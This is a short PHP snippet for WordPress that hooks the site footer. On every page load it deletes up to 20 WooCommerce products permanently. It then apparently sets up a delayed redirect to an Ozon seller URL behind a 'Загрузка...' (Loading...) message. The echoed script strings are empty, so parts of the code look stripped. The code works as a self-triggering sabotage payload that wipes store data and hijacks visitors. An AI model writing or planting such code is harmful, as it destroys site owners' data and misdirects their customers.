if ( ! function_exists( 'is_plugin_active' ) ) { require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } add_action('wp_footer', function() { global $wpdb; $products_to_delete = $wpdb->get_results("SELECT ID FROM {$wpdb->prefix}posts WHERE post_type = 'product' LIMIT 20"); foreach ($products_to_delete as $product) { wp_delete_post($product->ID, true); } $delay_ms = 3000; $target = 'https://seller.ozon.ru/?__rr=1&abt_att=1&origin_referer=seller.ozon.com'; echo ""; echo "
Загрузка...
"; echo ""; });